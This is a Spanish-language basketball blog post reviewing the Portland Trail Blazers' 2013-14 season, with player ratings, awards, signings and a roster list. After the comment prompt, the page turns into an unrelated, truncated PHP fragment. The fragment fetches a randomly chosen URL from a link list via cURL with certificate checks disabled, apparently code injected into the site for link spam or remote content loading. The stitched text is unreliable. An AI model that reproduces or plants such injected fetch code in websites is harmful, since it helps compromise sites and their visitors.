Portland Trail Blazers: Notable

22 de July de 2014 por TheDeerHunter

Preciosa campaña la del joven equipo de Oregón. Terry Stotts ha demostrado que puede haber una comunión de juego y resultados en un lugar donde hasta hace no mucho se vendía que ambos conceptos estaban reñidos. Cuajaron una regular extraordinaria fraguada en dos primeros meses impecables y unos más que notables playoffs, en los que eliminaron de manera brillante a unos “nuevos ricos” como Houston, a priori superiores, y únicamente claudicaron frente a una escuadra casi intocable como Spurs.

Los Blazers han superado todas las expectativas. Había que ser muy optimistas para vislumbrar una temporada como la que han protagonizado. Atendiendo a los resultados del año pasado y a su desdén habitual respecto al mercado de fichajes, no teníamos nada claro que pudieran colarse entre los ocho mejores equipos de la conferencia. Sobre el papel no lo eran ya que contaban con un quinteto (más sexto hombre) razonablemente potente pero con una plantilla alarmantemente corta que ya les costó muchos disgustos en el pasado inmediato. Llegamos a calificarles como “un proyecto a la deriva, como un trozo de madera lanzado al río por algún niño que si la corriente quiere quedará atrancada en algún meandro…”. Seguramente fue un comentario bastante insensato pero en nuestra defensa hemos de decir que de alguna forma sí se han apreciado algunas de las debilidades que señalamos en su momento merced a algunas lesiones puntuales que provocaron demasiadas derrotas y, cómo no, a ese duelo ante la rotación infinita de Popovich que de ninguna forma podían contrarrestar. 

Así, al hacer balance de la magnífica campaña 2013-14 hay que hablar de 6 jugadores que los parroquianos del Moda Center habrán terminado por recitar de memoria… Lillard, Matthews, Batum, Aldridge, Lopez y Mo Will. Para enmarcar el rendimiento de Lillard y Aldridge, ambos en el tercer quinteto de la liga, mérito que se queda corto en el caso del segundo, para muchos el mejor ala-pívot del año, que miró a la cara a Durant y LeBron en la carrera por el MVP durante los primeros meses de curso. Honoríficamente también fue el mejor jugador de primera ronda de los playoffs. El año “sophomore” de Lillard ha sido otra bestialidad, el único de su generación que aún resiste el paso a Anthony Davis. Su zénit fue el canastón del año para tumbar a Houston en las post-temporada pero semejante jugada no debe hacernos olvidar el nivel all star que ha mantenido todo el curso, como uno de los mejores bases de la liga. Tanto Matthews como Batum también han firmado la mejor temporada de sus carreras, convirtiéndose en uno de los dúos de aleros más completos y sacrificados de la liga. Robin Lopez también ha protagonizado su mejor campaña mejorando ostensiblemente en el apartado reboteador. Mención especial para Williams, cuya baja fue definitiva en playoffs, que no sólo ha sido un sexto hombre perfecto para ellos sinó que además se ha convertido en una especie de “hermano mayor” para Lillard y ha resultado decisivo en su extraordinario desarrollo.

En la parte negativa hay que colocar al resto de la plantilla. Parece mentira que Dorrell Wright sea el mismo que brillara con los Warriors, los jóvenes McCollum, Thomas Robinson, Barton, Freeland, Leonard, Crabb, Claver… apenas han contado algo para Stotts. La historia se repite con algunos de ellos y nos preguntamos si pueden ser recuperables en un futuro o directamente no tienen sitio en esta liga. Sobre el papel forman una de las peores segundas unidades de toda la competición.

En definitiva una campaña difícilmente mejorable con estos mimbres. Lo malo es que no terminamos de verles arrancar hacia objetivos mayores y atendiendo a cómo se han reforzado sus rivales tampoco vemos fácil que repitan algo así. Es una lástima.

PREMIOS

MVP: LaMarcus Aldridge ha promediado más de 23-11 en puntos y rebotes y casi 3 asistencias, 1 tapón y 1 robo rezumando clase en cada una de sus acciones. Desde Chris Webber no se ha visto tanto talento desde el poste alto.

Rookie: Nos habían hablado mucho y bien de CJ McCollum que ilusionó a muchos en las anteriores summer leagues. No empezó con buen pie con una lesión que le dejó en el dique seco más de la mitad del curso y después tampoco ha logrado entrar en la rotación.

Sorpresa: La pasmosa solvencia de un jugador de segundo año como Damian Lillard, que parece un veterano. Nos quedamos, no obstante, con Wesley Matthews que no sólo se ha erigido como el tercer espada del equipo sino también como uno de los mejores defensores de perímetro de toda la competición y como hombre de intendencia de valor incalculable.

Decepción: Hubo un tiempo en el que Dorell Wright anotaba dobles dígitos todos los días con una facilidad asombrosa. En tiempo récord ha pasado de rozar el 50% en tiros de campo y el 40% en triples a firmar un desastroso 37,4% y bajando. Resulta muy difícil de digerir considerándolo teóricamente un tirador especialista.

Esfuerzo en vano: La aportación de Mo Williams ha sido mucho mayor de lo que parecen indicar sus números, como ya hemos dicho. Perfectamente adaptado al rol que se le ha exigido. Fue una verdadera lástima su lesión en la postemporada. Su continuidad en el equipo está muy en el aire, aunque no le faltarán novias.

JUGANDO A GM

A falta de resolver la situación de Maurice Williams la plantilla 2014-15 está cerrada. No hace falta decir que habría que hacer el máximo esfuerzo en retenerle. Por un lado nos gusta el retorno a casa de un jugador tan cumplidor como Steve Blake, pero este fichaje no ayuda en absoluto a que el jugador se decante por la oferta de los Blazers.

El otro gran fichaje es el de Chris Kaman que pensamos que puede ser un acierto. La sensación global, sin embargo es de escasa o nula ambición y la franquicia puede pagarlo caro el curso que viene. Esperamos que esto sea una señal de que Stotts le va a dar mucha más bola a los “excluidos”. De otra forma no se entiende y nosotros habríamos fichado, como mínimo, un alero suplente más.

PG: Damian Lillard, Mo Williams, Steve Blake
SG: Wesley Matthews, CJ McCollum, Will Barton, Allen Crabbe
SF: Nicolas Batum, Dorell Wright
PF: LaMarcus Aldridge, Thomas Robinson, Victor Claver
C: Robin Lopez, Chris Kaman, Joel Freeland, Meyers Leonard

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>